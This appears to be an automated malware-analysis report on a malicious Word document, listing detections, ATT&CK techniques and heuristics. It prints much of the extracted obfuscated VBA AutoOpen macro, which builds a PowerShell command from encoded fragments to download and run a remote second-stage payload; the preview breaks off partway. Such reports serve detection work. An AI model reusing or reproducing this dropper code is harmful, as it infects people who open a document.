Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
The file contains a legacy WordBasic AutoOpen macro that attempts to execute obfuscated PowerShell code. The script concatenates several strings to form a PowerShell command, likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6458367-0' further supports its malicious nature as a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6458367-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6458367-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 7084a7102b3017f4dfd7522151f9321659834d3cdc31a6950cc05e87ab47e8b3) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6046 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wrap"
Sub AutoOpen()
Dim JR_PA As String
JP_SE = Array("c", "s", "x", "p", "d", " ", "t", "n", "y", "u", "w", "i", "r", "a", "h", "b", "o", "l", "e", "-")
Dim FM_TI As String
FM_TI = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
JR_PA = JR_PA + JP_SE(3)
JR_PA = JR_PA + JP_SE(16)
Dim AO_NF As String
AO_NF = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQ"
JR_PA = JR_PA + JP_SE(10)
JR_PA = JR_PA + JP_SE(18)
Dim BN_RG As String
BN_RG = "BzAHQAZQB"
JR_PA = JR_PA + JP_SE(12)
JR_PA = JR_PA + JP_SE(1)
Dim DT_ND As String
DT_ND = "tAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA"
JR_PA = JR_PA + JP_SE(14)
JR_PA = JR_PA + JP_SE(18)
Dim FM_ME As String
FM_ME = "DoAOgBVAFQARgA4AC4ARwBlAHQA"
AN_SG = AN_SG & FM_TI & AO_NF & BN_RG & DT_ND & FM_ME
JR_PA = JR_PA + JP_SE(17)
JR_PA = JR_PA + JP_SE(17)
Dim AK_LJ As String
AK_LJ = "UwB0AHIAaQBuAGcAK"
JR_PA = JR_PA + JP_SE(5)
JR_PA = JR_PA + JP_SE(19)
Dim HQ_PA As String
HQ_PA = "ABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgB"
JR_PA = JR_PA + JP_SE(10)
JR_PA = JR_PA + JP_SE(11)
Dim FM_NI As String
FM_NI = "lAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUAN"
JR_PA = JR_PA + JP_SE(7)
JR_PA = JR_PA + JP_SE(4)
Dim AR_OB As String
AR_OB = "gA0AFMAdAByAGkAbgBnACgAJ"
JR_PA = JR_PA + JP_SE(16)
JR_PA = JR_PA + JP_SE(10)
Dim EP_MD As String
EP_MD = "AB4ACkAKQ"
AN_SG = AN_SG & AK_LJ & HQ_PA & FM_NI & AR_OB & EP_MD
JR_PA = JR_PA + JP_SE(1)
JR_PA = JR_PA + JP_SE(6)
Dim IK_RI As String
IK_RI = "B9ADsAaQBlAHgAIAAkACgAYQAgACQAKAAkAC"
JR_PA = JR_PA + JP_SE(8)
JR_PA = JR_PA + JP_SE(17)
Dim HS_OA As String
HS_OA = "gAJAAoAGkAbgB2AG8AawBlAC0AdwBlAG"
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(5)
Dim IL_TI As String
IL_TI = "IAcgBlAHEAdQBlAHMAdAAgACcAaA"
JR_PA = JR_PA + JP_SE(14)
JR_PA = JR_PA + JP_SE(11)
Dim FM_QG As String
FM_QG = "B0AHQAcAB"
JR_PA = JR_PA + JP_SE(4)
JR_PA = JR_PA + JP_SE(4)
Dim ER_QA As String
ER_QA = "zADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuA"
AN_SG = AN_SG & IK_RI & HS_OA & IL_TI & FM_QG & ER_QA
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(7)
Dim DQ_NH As String
DQ_NH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
JR_PA = JR_PA + JP_SE(5)
JR_PA = JR_PA + JP_SE(19)
Dim JL_OH As String
JL_OH = "BpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8Ad"
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(2)
Dim GT_PF As String
GT_PF = "QBzAGUAP"
JR_PA = JR_PA + JP_SE(18)
JR_PA = JR_PA + JP_SE(0)
Dim AP_KB As String
AP_KB = "wAkAGYAaQBsAHQAZQByAD0AUABhAHIAdABpAHQAaQBvAG"
JR_PA = JR_PA + JP_SE(9)
JR_PA = JR_PA + JP_SE(6)
Dim JS_SF As String
JS_SF = "4ASwBlAHkAJQ"
AN_SG = AN_SG & DQ_NH & JL_OH & GT_PF & AP_KB & JS_SF
JR_PA = JR_PA + JP_SE(11)
JR_PA = JR_PA + JP_SE(16)
Dim BN_QD As String
BN_QD = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdAB"
JR_PA = JR_PA + JP_SE(7)
JR_PA = JR_PA + JP_SE(3)
Dim FL_KF As String
FL_KF = "hAGcAZQAlADIANwAmACQAUwBlAGwAZQBjAHQAPQBkA"
JR_PA = JR_PA + JP_SE(16)
JR_PA = JR_PA + JP_SE(17)
Dim DT_OB As String
DT_OB = "GEAdABhACYAcwB2AD0"
JR_PA = JR_PA + JP_SE(11)
JR_PA = JR_PA + JP_SE(0)
Dim AN_KB As String
AN_KB = "AMgAwADEANwAtADAANAAtADEANwAmAHMAcw"
JR_PA = JR_PA + JP_SE(8)
JR_PA = JR_PA + JP_SE(5)
Dim EL_TB As String
EL_TB = "A9AGIAZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0A"
AN_SG = AN_SG & BN_QD & FL_KF & DT_OB & AN_KB & EL_TB
JR_PA = JR_PA + JP_SE(15)
JR_PA = JR_PA + JP_SE(8)
Dim JQ_LB As String
JQ
... (truncated)